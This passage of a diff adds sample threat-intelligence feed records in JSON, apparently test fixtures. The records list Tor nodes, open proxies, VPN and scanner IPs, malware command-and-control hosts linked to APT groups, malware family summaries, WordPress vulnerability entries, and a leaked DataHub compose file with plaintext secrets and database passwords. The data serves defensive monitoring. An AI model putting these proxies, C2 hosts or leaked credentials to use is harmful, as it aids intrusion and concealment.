90, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "id": "188.241.80.46", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "188.241.80.46", + "provider": null, + "region": null + }, + "nodes": [], + "portalLink": null, + "seqUpdate": 1682360269562000, + "source": "check.torproject.org" + }, + { + "bind": null, + "dateFirstSeen": "2022-05-02T19:08:51+00:00", + "dateLastSeen": "2022-08-23T07:36:12+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 90, + "reliability": 90, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "id": "83.137.158.16", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "83.137.158.16", + "provider": null, + "region": null + }, + "nodes": [], + "portalLink": null, + "seqUpdate": 1682360409780000, + "source": "tor_banner" + } + ], + "seqUpdate": 1682360409780000 + }, + "suspicious_ip/open_proxy":{ + "count": 3454691, + "items": [ + { + "anonymous": "", + "bind": null, + "dateDetected": "2014-10-01T13:46:14+00:00", + "dateFirstSeen": "2014-10-01T13:46:14+00:00", + "dateLastSeen": "2014-10-01T13:46:14+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "61.238.12.158", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "HK", + "countryName": null, + "ip": "61.238.12.158", + "provider": null, + "region": null + }, + "oldId": "11aaaac89b10f8863fef7335a1f7839a23c9a710", + "port": 8088, + "portalLink": null, + "seqUpdate": 1460383585066000, + "source": "free-proxy-list.net", + "sources": [ + "free-proxy-list.net" + ], + "stixGuid": null, + "type": "http" + }, + { + "anonymous": "", + "bind": null, + "dateDetected": "2014-10-01T13:46:14+00:00", + "dateFirstSeen": "2014-10-01T13:46:14+00:00", + "dateLastSeen": "2014-10-01T13:46:14+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "1.175.177.135", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "TW", + "countryName": null, + "ip": "1.175.177.135", + "provider": null, + "region": null + }, + "oldId": "78001defd30996ea8d4e770730631863bbd67ce9", + "port": 9064, + "portalLink": null, + "seqUpdate": 1460383585071000, + "source": "free-proxy-list.net", + "sources": [ + "free-proxy-list.net" + ], + "stixGuid": null, + "type": "https" + }, + { + "anonymous": "", + "bind": null, + "dateDetected": "2014-10-01T13:46:14+00:00", + "dateFirstSeen": "2014-10-01T13:46:14+00:00", + "dateLastSeen": "2014-10-01T13:46:14+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "61.62.7.209", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "TW", + "countryName": null, + "ip": "61.62.7.209", + "provider": null, + "region": null + }, + "oldId": "b3ac84363ff3659472a64dc6c313b5d0b0df4866", + "port": 9064, + "portalLink": null, + "seqUpdate": 1460383585073000, + "source": "free-proxy-list.net", + "sources": [ + "free-proxy-list.net" + ], + "stixGuid": null, + "type": "https" + } + ], + "seqUpdate": 1460383585073000 + }, + "suspicious_ip/socks_proxy":{ + "count": 28086846, + "items": [ + { + "bind": null, + "dateDetected": "2014-11-05T05:00:11+00:00", + "dateFirstSeen": "2014-11-05T05:00:11+00:00", + "dateLastSeen": "2014-11-05T17:00:11+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "114.143.160.66", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "IN", + "countryName": null, + "ip": "114.143.160.66", + "provider": null, + "region": null + }, + "oldId": "a78ecc975e74876300f6ee54d829fabf6e1fc243", + "portalLink": null, + "seqUpdate": 1460491661013000, + "source": "awmproxy", + "stixGuid": null + }, + { + "bind": null, + "dateDetected": "2014-11-05T05:20:03+00:00", + "dateFirstSeen": "2014-11-05T05:20:03+00:00", + "dateLastSeen": "2014-11-05T17:20:03+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "91.185.11.165", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "KZ", + "countryName": null, + "ip": "91.185.11.165", + "provider": null, + "region": null + }, + "oldId": "afa5e3e33a0d78d8dfc06f502400c4c17ffaf33d", + "portalLink": null, + "seqUpdate": 1460491661026000, + "source": "awmproxy", + "stixGuid": null + }, + { + "bind": null, + "dateDetected": "2014-11-05T05:01:06+00:00", + "dateFirstSeen": "2014-11-05T05:01:06+00:00", + "dateLastSeen": "2014-11-05T17:01:06+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "1.46.71.151", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "TH", + "countryName": null, + "ip": "1.46.71.151", + "provider": null, + "region": null + }, + "oldId": "f8eb2e7a96a6d5fa18232b74660a911a1511a435", + "portalLink": null, + "seqUpdate": 1460491661046000, + "source": "awmproxy", + "stixGuid": null + } + ], + "seqUpdate": 1460491661046000 + }, + "suspicious_ip/vpn":{ + "count": 741499, + "items": [ + { + "bind": null, + "dateFirstSeen": "2021-04-22T12:43:38+00:00", + "dateLastSeen": "2021-04-22T12:43:38+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "188.250.243.135", + "ipv4": { + "asn": "AS3243", + "city": null, + "countryCode": "PT", + "countryName": null, + "ip": "188.250.243.135", + "provider": null, + "region": null + }, + "names": [ + "SoftEther VPN" + ], + "portalLink": null, + "rules": [ + "vpn_soft_ether" + ], + "seqUpdate": 1671657409977576, + "source": "playbook", + "sources": [ + "playbook" + ], + "types": [ + "self-hosted" + ] + }, + { + "bind": null, + "dateFirstSeen": "2021-04-17T12:03:44+00:00", + "dateLastSeen": "2021-04-17T12:03:44+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "52.188.125.80", + "ipv4": { + "asn": "AS8075", + "city": null, + "countryCode": null, + "countryName": null, + "ip": "52.188.125.80", + "provider": null, + "region": null + }, + "names": [ + "SoftEther VPN" + ], + "portalLink": null, + "rules": [ + "vpn_soft_ether" + ], + "seqUpdate": 1671657409978158, + "source": "playbook", + "sources": [ + "playbook" + ], + "types": [ + "self-hosted" + ] + }, + { + "bind": null, + "dateFirstSeen": "2020-12-11T13:33:54+00:00", + "dateLastSeen": "2020-12-11T13:33:54+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "168.119.130.217", + "ipv4": { + "asn": "AS24940", + "city": null, + "countryCode": "DE", + "countryName": null, + "ip": "168.119.130.217", + "provider": null, + "region": null + }, + "names": [ + "SoftEther VPN" + ], + "portalLink": null, + "rules": [ + "vpn_soft_ether" + ], + "seqUpdate": 1671657410005695, + "source": "playbook", + "sources": [ + "playbook" + ], + "types": [ + "self-hosted" + ] + } + ], + "seqUpdate": 1671657410005695 + }, + "suspicious_ip/scanner":{ + "count": 20143973, + "items": [ + { + "bind": null, + "categories": [ + "Brute-Force" + ], + "dateFirstSeen": "2021-08-11T03:30:53+00:00", + "dateLastSeen": "2021-08-11T03:30:53+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "180.180.112.221", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "180.180.112.221", + "provider": null, + "region": null + }, + "portalLink": null, + "seqUpdate": 1628553600000000, + "sources": [] + }, + { + "bind": null, + "categories": [ + "Brute-Force", + "SSH" + ], + "dateFirstSeen": "2021-08-11T03:51:19+00:00", + "dateLastSeen": "2021-08-11T08:57:51+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "159.89.54.66", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "159.89.54.66", + "provider": null, + "region": null + }, + "portalLink": null, + "seqUpdate": 1628553600000000, + "sources": [] + }, + { + "bind": null, + "categories": [ + "Brute-Force" + ], + "dateFirstSeen": "2021-08-11T03:30:49+00:00", + "dateLastSeen": "2021-08-11T03:30:49+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "49.149.72.230", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "49.149.72.230", + "provider": null, + "region": null + }, + "portalLink": null, + "seqUpdate": 1628553600000000, + "sources": [] + } + ], + "seqUpdate": 1628553600000000 + }, + "malware/cnc":{ + "count": 148783, + "items": [ + { + "cnc": "hint09.9966.org", + "dateDetected": "2013-05-31T20:00:00Z", + "dateFirstSeen": "2013-05-31T20:00:00Z", + "dateLastSeen": "2013-05-31T20:00:00Z", + "domain": "hint09.9966.org", + "file": null, + "id": "cb08296b420fcce499ef84edb7ac314970953a00", + "ipv4": [], + "ipv6": [], + "malwareList": [], + "platform": "", + "seqUpdate": 13700304004, + "threatActor": [ + { + "id": "96054da361e4092a5a509862356f9f2541b86e9e", + "name": "NetTraveler" + } + ], + "url": "" + }, + { + "cnc": "82.113.19.75", + "dateDetected": "2014-08-06T20:00:00Z", + "dateFirstSeen": "2014-08-06T20:00:00Z", + "dateLastSeen": "2014-08-06T20:00:00Z", + "domain": "", + "file": null, + "id": "d67606f9fb3f81dbddbea74f3231613a742dc397", + "ipv4": [ + { + "asn": "", + "city": "", + "countryCode": "", + "countryName": "", + "ip": "82.113.19.75", + "provider": "", + "region": "" + } + ], + "ipv6": [], + "malwareList": [], + "platform": "", + "seqUpdate": 14073552002, + "threatActor": [ + { + "id": "03cf30aa129ecf2eba833773e10786b1558ac212", + "name": "Turla" + } + ], + "url": "" + }, + { + "cnc": "sofexjordan2014.com", + "dateDetected": "2014-10-21T20:00:00Z", + "dateFirstSeen": "2014-10-21T20:00:00Z", + "dateLastSeen": "2014-10-21T20:00:00Z", + "domain": "sofexjordan2014.com", + "file": null, + "id": "f304865cea057e3bfce2a2f38cbbe0dabaa32728", + "ipv4": [], + "ipv6": [], + "malwareList": [], + "platform": "", + "seqUpdate": 14139216000, + "threatActor": [ + { + "id": "fbde425d47a07be229130d3bd3a61b90d2b090ca", + "name": "APT28" + } + ], + "url": "" + } + ], + "seqUpdate": 14139216000 + }, + "malware/malware":{ + "count": 36, + "items": [ + { + "aliases": [], + "attachedFile": [], + "category": [ + "atm-malware" + ], + "class": null, + "deletedIocList": null, + "description": "Sorry, no description yet.", + "fileIocIdList": [], + "fileIocList": [], + "geoRegion": [ + "asia", + "asia", + "europe", + "america:northern_america", + "europe", + "asia", + "asia", + "asia", + "asia", + "asia", + "europe:european_union", + "asia", + "europe:european_union", + "asia", + "america:south_america", + "europe:european_union", + "middle_east", + "asia", + "asia", + "america:south_america", + "oceania", + "asia", + "america:northern_america", + "africa:northern_africa", + "europe:european_union", + "europe:european_union", + "middle_east", + "europe:european_union", + "europe", + "africa:southern_africa", + "europe:european_union", + "asia", + "middle_east", + "europe:european_union", + "america:central_america", + "europe:european_union", + "asia", + "middle_east", + "europe", + "america:south_america", + "america:south_america", + "europe:european_union", + "europe:european_union", + "europe:european_union", + "europe:european_union", + "europe:european_union", + "africa:western_africa", + "europe", + "oceania", + "america:south_america", + "europe:european_union", + "europe", + "europe", + "europe:european_union", + "europe:european_union", + "europe:european_union", + "america:south_america", + "middle_east", + "asia", + "asia", + "africa:northern_africa", + "asia", + "middle_east", + "europe:european_union", + "europe", + "europe:european_union", + "africa:northern_africa", + "america:south_america", + "america:south_america" + ], + "id": "d7fde57f6ed2051ffae9257ba6beefe0fc99192f", + "isPublished": true, + "langs": [ + "ru", + "en" + ], + "linkedMalware": [], + "malwareAliasList": [], + "mitreMatrix": [], + "name": "FASTCash", + "networkIocIdList": [], + "networkIocList": [], + "platform": [ + "atm", + "Windows", + "Linux" + ], + "portalLink": null, + "seqUpdate": 16904733083037, + "sequenceId": 16269766696153, + "shortDescription": "This malware in turn intercepts fraudulent Lazarus cash withdrawal requests and sends fake approval responses, allowing the attackers to steal cash from ATMs.", + "signatureIdList": [], + "sourceCountry": [ + "KP", + "KR", + "RU", + "US", + "GB", + "IN", + "CN", + "VN", + "JP", + "TH", + "FR", + "HK", + "PL", + "SG", + "BR", + "DE", + "IL", + "PK", + "TW", + "AR", + "AU", + "BD", + "CA", + "EG", + "ES", + "IT", + "SA", + "SE", + "TR", + "ZA", + "BE", + "ID", + "IR", + "MT", + "MX", + "NL", + "PH", + "AE", + "CH", + "CL", + "CO", + "CZ", + "EE", + "FI", + "HU", + "IE", + "NG", + "NO", + "NZ", + "PE", + "SK", + "UA", + "AL", + "AT", + "BG", + "DK", + "EC", + "JO", + "KH", + "LK", + "MA", + "MY", + "OM", + "PT", + "RS", + "SI", + "TN", + "UY", + "VE" + ], + "taList": [ + { + "id": "5e9f20fdcf5876b5772b3d09b432f4080711ac5f", + "name": "Lazarus", + "url": "" + } + ], + "threatActorList": [], + "threatLevel": "High", + "updatedAt": "2024-10-22T14:58:02+03:00", + "yaraIdList": [] + }, + { + "aliases": [], + "attachedFile": [ + { + "hash": "16014bffb0788f55a7eb0ce312642cee58ec5a1153dbf1c9d38b1158abad8e02", + "mime": "image/png", + "name": "16014bffb0788f55a7eb0ce312642cee58ec5a1153dbf1c9d38b1158abad8e02", + "size": 15135 + } + ], + "category": [ + "Downloader" + ], + "class": null, + "deletedIocList": null, + "description": "Sorry, no description yet.", + "fileIocIdList": [], + "fileIocList": [], + "geoRegion": [], + "id": "8b1595ec48c0c21b16cae531bbfac1586ed2a429", + "isPublished": true, + "langs": [ + "en" + ], + "linkedMalware": [ + { + "id": "8f8b2e715cf5990f3e0eb5f6485c0d3fe67b2611", + "name": "Jcookie" + } + ], + "malwareAliasList": [], + "mitreMatrix": [], + "name": "CookieTime", + "networkIocIdList": [], + "networkIocList": [], + "platform": [ + "Windows" + ], + "portalLink": null, + "seqUpdate": 16904744513932, + "sequenceId": 16499459571753, + "shortDescription": "CookieTime is a downloader similar to Torisma, and some of the samples are protected with VMProtect packer. In order to deliver the request type to the C2 server, it uses encoded cookie values and fetches command files from the C2 server. Some of the C2 communication takes advantage of steganography techniques, delivered in files exchanged between infected clients and the C2 server. The contents are disguised as GIF image files, but contain encrypted commands from the C2 server and command execution results.", + "signatureIdList": [], + "sourceCountry": [], + "taList": [ + { + "id": "5e9f20fdcf5876b5772b3d09b432f4080711ac5f", + "name": "Lazarus", + "url": "" + } + ], + "threatActorList": [], + "threatLevel": "Medium", + "updatedAt": "2024-10-16T11:15:58+03:00", + "yaraIdList": [] + }, + { + "aliases": [], + "attachedFile": [ + { + "hash": "21473f69324a9cbdd6787101cd6394cec3c472a82ef49d264032db705748009d", + "mime": "image/png", + "name": "21473f69324a9cbdd6787101cd6394cec3c472a82ef49d264032db705748009d", + "size": 17618 + } + ], + "category": [ + "Remote Access Trojan", + "Rootkit", + "Trojan" + ], + "class": null, + "deletedIocList": null, + "description": "Sorry, no description yet.", + "fileIocIdList": [], + "fileIocList": [], + "geoRegion": [ + "asia" + ], + "id": "e67e9a2a7aa689a1657aa15ee0db1cf6b45c68f2", + "isPublished": true, + "langs": [ + "en" + ], + "linkedMalware": [], + "malwareAliasList": [], + "mitreMatrix": [], + "name": "Krasue", + "networkIocIdList": [], + "networkIocList": [], + "platform": [ + "Linux" + ], + "portalLink": null, + "seqUpdate": 17020334285354, + "sequenceId": 16875077457841, + "shortDescription": "Krasue is a Linux malware. It has managed to fly under the radar for a significant period. Its discovery underscores the threat it poses to critical systems and sensitive data. Capable of granting remote access to attackers, Krasue presents a significant risk. The malware also features a rootkit that is embedded inside the binary.", + "signatureIdList": [], + "sourceCountry": [ + "TH" + ], + "taList": [ + { + "id": "038325ee019f51440f8831e2a270603730a36504", + "name": "Unclassified_TA", + "url": "" + } + ], + "threatActorList": [], + "threatLevel": "Medium", + "updatedAt": "2024-09-30T11:15:13+03:00", + "yaraIdList": [] + } + ], + "seqUpdate": 17020334285354 + }, + "osi/vulnerability":{ + "count": 454062, + "items": [ + { + "affectedSoftware": [ + { + "name": "shrimptest", + "operator": "lt", + "version": "1.0b3" + } + ], + "bulletinFamily": "software", + "cpe": [], + "cpeTable": [], + "cveList": [], + "cveListEpss": [], + "cvss": { + "score": 0, + "vector": "NONE" + }, + "cvssAttackVector": "", + "darkweb": [], + "dateLastSeen": "2018-09-17T17:26:04+01:00", + "dateModified": "2015-05-14T22:00:00+01:00", + "datePublished": "2014-07-31T21:00:00+01:00", + "description": "WordPress Vulnerability - ShrimpTest 1.0b2 - plugins/plugin-notification.php Unspecified XSS\n", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isFavourite": false, + "isHidden": false + }, + "epss": { + "cve": "", + "date": "0001-01-01T00:00:00Z", + "epss": 0, + "percentile": 0 + }, + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 100, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "exploitCount": 0, + "exploitList": [], + "exploitation": [], + "extDescription": "", + "githubLinkList": [], + "hasExploit": false, + "href": "https://wpvulndb.com/vulnerabilities/7181", + "id": "WPVDB-ID:7181", + "lastseen": "2018-09-17T17:26:04+01:00", + "mergedCvss": 0, + "modified": "2015-05-14T22:00:00+01:00", + "portalLink": "", + "provider": "vulners.com", + "published": "2014-07-31T21:00:00+01:00", + "references": [], + "reporter": "wpvulndb", + "seenInTheWild": false, + "seqUpdate": 15677944090287, + "softwareMixed": [], + "threats": [], + "threatsList": [], + "timeLineData": [], + "title": "ShrimpTest 1.0b2 - plugins/plugin-notification.php Unspecified XSS", + "twitter": [], + "type": "wpvulndb" + }, + { + "affectedSoftware": [ + { + "name": "super-refer-a-friend", + "operator": "lt", + "version": "1.0" + } + ], + "bulletinFamily": "software", + "cpe": [], + "cpeTable": [], + "cveList": [], + "cveListEpss": [], + "cvss": { + "score": 0, + "vector": "NONE" + }, + "cvssAttackVector": "", + "darkweb": [], + "dateLastSeen": "2018-09-17T17:26:47+01:00", + "dateModified": "2018-08-28T22:00:00+01:00", + "datePublished": "2014-07-31T21:00:00+01:00", + "description": "WordPress Vulnerability - super-refer-a-friend - Full Path Disclosure\n", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isFavourite": false, + "isHidden": false + }, + "epss": { + "cve": "", + "date": "0001-01-01T00:00:00Z", + "epss": 0, + "percentile": 0 + }, + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 100, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "exploitCount": 0, + "exploitList": [], + "exploitation": [], + "extDescription": "", + "githubLinkList": [], + "hasExploit": false, + "href": "https://wpvulndb.com/vulnerabilities/6620", + "id": "WPVDB-ID:6620", + "lastseen": "2018-09-17T17:26:47+01:00", + "mergedCvss": 0, + "modified": "2018-08-28T22:00:00+01:00", + "portalLink": "", + "provider": "vulners.com", + "published": "2014-07-31T21:00:00+01:00", + "references": [], + "reporter": "wpvulndb", + "seenInTheWild": false, + "seqUpdate": 15677944269535, + "softwareMixed": [], + "threats": [], + "threatsList": [], + "timeLineData": [], + "title": "super-refer-a-friend - Full Path Disclosure", + "twitter": [], + "type": "wpvulndb" + }, + { + "affectedSoftware": [ + { + "name": "shrimptest", + "operator": "lt", + "version": "1.0b3" + } + ], + "bulletinFamily": "software", + "cpe": [], + "cpeTable": [], + "cveList": [], + "cveListEpss": [], + "cvss": { + "score": 0, + "vector": "NONE" + }, + "cvssAttackVector": "", + "darkweb": [], + "dateLastSeen": "2018-09-17T17:26:03+01:00", + "dateModified": "2015-05-14T22:00:00+01:00", + "datePublished": "2014-07-31T21:00:00+01:00", + "description": "WordPress Vulnerability - ShrimpTest 1.0b2 - plugins/metric-conversion.php Multiple Unspecified XSS\n", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isFavourite": false, + "isHidden": false + }, + "epss": { + "cve": "", + "date": "0001-01-01T00:00:00Z", + "epss": 0, + "percentile": 0 + }, + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 100, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "exploitCount": 0, + "exploitList": [], + "exploitation": [], + "extDescription": "", + "githubLinkList": [], + "hasExploit": false, + "href": "https://wpvulndb.com/vulnerabilities/7180", + "id": "WPVDB-ID:7180", + "lastseen": "2018-09-17T17:26:03+01:00", + "mergedCvss": 0, + "modified": "2015-05-14T22:00:00+01:00", + "portalLink": "", + "provider": "vulners.com", + "published": "2014-07-31T21:00:00+01:00", + "references": [], + "reporter": "wpvulndb", + "seenInTheWild": false, + "seqUpdate": 15677944270178, + "softwareMixed": [], + "threats": [], + "threatsList": [], + "timeLineData": [], + "title": "ShrimpTest 1.0b2 - plugins/metric-conversion.php Multiple Unspecified XSS", + "twitter": [], + "type": "wpvulndb" + } + ], + "seqUpdate": 15677944270178 + }, + "osi/public_leak":{ + "count": 24353999, + "items": [ + { + "bind": [], + "created": "2022-05-05T20:26:25+03:00", + "data": "networks:\r\n default:\r\n name: datahub_network\r\nservices:\r\n broker:\r\n container_name: broker\r\n depends_on:\r\n - zookeeper\r\n environment:\r\n - KAFKA_BROKER_ID=1\r\n - KAFKA_ZOOKEEPER_CONNECT=zookeeper:2181\r\n - KAFKA_LISTENER_SECURITY_PROTOCOL_MAP=PLAINTEXT:PLAINTEXT,PLAINTEXT_HOST:PLAINTEXT\r\n - KAFKA_ADVERTISED_LISTENERS=PLAINTEXT://broker:29092,PLAINTEXT_HOST://localhost:9092\r\n - KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR=1\r\n - KAFKA_GROUP_INITIAL_REBALANCE_DELAY_MS=0\r\n - KAFKA_HEAP_OPTS=-Xms256m -Xmx256m\r\n hostname: broker\r\n image: confluentinc/cp-kafka:5.4.0\r\n ports:\r\n - 29092:29092\r\n - 9092:9092\r\n datahub-actions:\r\n depends_on:\r\n - datahub-gms\r\n environment:\r\n - GMS_HOST=datahub-gms\r\n - GMS_PORT=8080\r\n - KAFKA_BOOTSTRAP_SERVER=broker:29092\r\n - SCHEMA_REGISTRY_URL=http://schema-registry:8081\r\n - METADATA_AUDIT_EVENT_NAME=MetadataAuditEvent_v4\r\n - METADATA_CHANGE_LOG_VERSIONED_TOPIC_NAME=MetadataChangeLog_Versioned_v1\r\n - DATAHUB_SYSTEM_CLIENT_ID=__datahub_system\r\n - DATAHUB_SYSTEM_CLIENT_SECRET=JohnSnowKnowsNothing\r\n - KAFKA_PROPERTIES_SECURITY_PROTOCOL=PLAINTEXT\r\n hostname: actions\r\n image: public.ecr.aws/datahub/acryl-datahub-actions:${ACTIONS_VERSION:-head}\r\n restart: on-failure:5\r\n datahub-frontend-react:\r\n container_name: datahub-frontend-react\r\n depends_on:\r\n - datahub-gms\r\n environment:\r\n - DATAHUB_GMS_HOST=datahub-gms\r\n - DATAHUB_GMS_PORT=8080\r\n - DATAHUB_SECRET=YouKnowNothing\r\n - DATAHUB_APP_VERSION=1.0\r\n - DATAHUB_PLAY_MEM_BUFFER_SIZE=10MB\r\n - JAVA_OPTS=-Xms512m -Xmx512m -Dhttp.port=9002 -Dconfig.file=datahub-frontend/conf/application.conf -Djava.security.auth.login.config=datahub-frontend/conf/jaas.conf -Dlogback.configurationFile=datahub-frontend/conf/logback.xml -Dlogback.debug=false -Dpidfile.path=/dev/null\r\n - KAFKA_BOOTSTRAP_SERVER=broker:29092\r\n - DATAHUB_TRACKING_TOPIC=DataHubUsageEvent_v1\r\n - ELASTIC_CLIENT_HOST=elasticsearch\r\n - ELASTIC_CLIENT_PORT=9200\r\n - AUTH_OIDC_ENABLED=true\r\n - AUTH_OIDC_CLIENT_ID=${DATAHUB_IAM_ID}\r\n - AUTH_OIDC_CLIENT_SECRET=${DATAHUB_IAM_SECRET}\r\n - AUTH_OIDC_DISCOVERY_URI=${DATAHUB_IAM_URI}\r\n - AUTH_OIDC_BASE_URL=${DATAHUB_URL}\r\n #- AUTH_OIDC_SCOPE=\"\"\r\n - METADATA_SERVICE_AUTH_ENABLED=true\r\n hostname: datahub-frontend-react\r\n image: linkedin/datahub-frontend-react:${DATAHUB_VERSION:-head}\r\n ports:\r\n - 9002:9002\r\n volumes:\r\n - ${HOME}/.datahub/plugins:/etc/datahub/plugins\r\n - ${HOME}/.datahub/plugins/frontend/auth/user.props:/datahub-frontend/conf/user.props\r\n datahub-gms:\r\n container_name: datahub-gms\r\n depends_on:\r\n - mysql\r\n environment:\r\n - DATASET_ENABLE_SCSI=false\r\n - EBEAN_DATASOURCE_USERNAME=datahub\r\n - EBEAN_DATASOURCE_PASSWORD=datahub\r\n - EBEAN_DATASOURCE_HOST=mysql:3306\r\n - EBEAN_DATASOURCE_URL=jdbc:mysql://mysql:3306/datahub?verifyServerCertificate=false&useSSL=true&useUnicode=yes&characterEncoding=UTF-8\r\n - EBEAN_DATASOURCE_DRIVER=com.mysql.jdbc.Driver\r\n - KAFKA_BOOTSTRAP_SERVER=broker:29092\r\n - KAFKA_SCHEMAREGISTRY_URL=http://schema-registry:8081\r\n - ELASTICSEARCH_HOST=elasticsearch\r\n - ELASTICSEARCH_PORT=9200\r\n - GRAPH_SERVICE_IMPL=elasticsearch\r\n - JAVA_OPTS=-Xms1g -Xmx1g\r\n - ENTITY_REGISTRY_CONFIG_PATH=/datahub/datahub-gms/resources/entity-registry.yml\r\n - MAE_CONSUMER_ENABLED=true\r\n - MCE_CONSUMER_ENABLED=true\r\n - UI_INGESTION_ENABLED=true\r\n - UI_INGESTION_DEFAULT_CLI_VERSION=0.8.26.6\r\n - METADATA_SERVICE_AUTH_ENABLED=true\r\n hostname: datahub-gms\r\n image: linkedin/datahub-gms:${DATAHUB_VERSION:-head}\r\n ports:\r\n - 8080:8080\r\n volumes:\r\n - ${HOME}/.datahub/plugins:/etc/datahub/plugins\r\n elasticsearch:\r\n container_name: elasticsearch\r\n environment:\r\n - discovery.type=single-node\r\n - xpack.security.enabled=false\r\n - ES_JAVA_OPTS=-Xms256m -Xmx256m -Dlog4j2.formatMsgNoLookups=true\r\n healthcheck:\r\n retries: 4\r\n start_period: 2m\r\n test:\r\n - CMD-SHELL\r\n - curl -sS --fail 'http://localhost:9200/_cluster/health?wait_for_status=yellow&timeout=0s' || exit 1\r\n hostname: elasticsearch\r\n image: elasticsearch:7.9.3\r\n mem_limit: 1g\r\n ports:\r\n - 9200:9200\r\n volumes:\r\n - esdata:/usr/share/elasticsearch/data\r\n elasticsearch-setup:\r\n container_name: elasticsearch-setup\r\n depends_on:\r\n - elasticsearch\r\n environment:\r\n - ELASTICSEARCH_HOST=elasticsearch\r\n - ELASTICSEARCH_PORT=9200\r\n - ELASTICSEARCH_PROTOCOL=http\r\n hostname: elasticsearch-setup\r\n image: linkedin/datahub-elasticsearch-setup:${DATAHUB_VERSION:-head}\r\n kafka-setup:\r\n container_name: kafka-setup\r\n depends_on:\r\n - broker\r\n - schema-registry\r\n environment:\r\n - KAFKA_ZOOKEEPER_CONNECT=zookeeper:2181\r\n - KAFKA_BOOTSTRAP_SERVER=broker:29092\r\n hostname: kafka-setup\r\n image: linkedin/datahub-kafka-setup:${DATAHUB_VERSION:-head}\r\n mysql:\r\n command: --character-set-server=utf8mb4 --collation-server=utf8mb4_bin\r\n container_name: mysql\r\n environment:\r\n - MYSQL_DATABASE=datahub\r\n - MYSQL_USER=datahub\r\n - MYSQL_PASSWORD=datahub\r\n - MYSQL_ROOT_PASSWORD=datahub\r\n hostname: mysql\r\n image: mysql:5.7\r\n ports:\r\n - 3306:3306\r\n volumes:\r\n - ../mysql/init.sql:/docker-entrypoint-initdb.d/init.sql\r\n - mysqldata:/var/lib/mysql\r\n mysql-setup:\r\n container_name: mysql-setup\r\n depends_on:\r\n - mysql\r\n environment:\r\n - MYSQL_HOST=mysql\r\n - MYSQL_PORT=3306\r\n - MYSQL_USERNAME=datahub\r\n - MYSQL_PASSWORD=datahub\r\n - DATAHUB_DB_NAME=datahub\r\n hostname: mysql-setup\r\n image: acryldata/datahub-mysql-setup:head\r\n schema-registry:\r\n container_name: schema-registry\r\n depends_on:\r\n - zookeeper\r\n - broker\r\n environment:\r\n - SCHEMA_REGISTRY_HOST_NAME=schemaregistry\r\n - SCHEMA_REGISTRY_KAFKASTORE_CONNECTION_URL=zookeeper:2181\r\n hostname: schema-registry\r\n image: confluentinc/cp-schema-registry:5.4.0\r\n ports:\r\n - 8081:8081\r\n zookeeper:\r\n container_name: zookeeper\r\n environment:\r\n - ZOOKEEPER_CLIENT_PORT=2181\r\n - ZOOKEEPER_TICK_TIME=2000\r\n hostname: zookeeper\r\n image: confluentinc/cp-zookeeper:5.4.0\r\n ports:\r\n - 2181:2181\r\n volumes:\r\n - zkdata:/var/opt/zookeeper\r\nversion: '2.3'\r\nvolumes:\r\n esdata: null\r\n mysqldata: null\r\n zkdata: null\r\n", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiralty_code": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": 30 + }, + "hash": "0083e0516cac929a5f5267f8f5ebebb77063f235", + "id": 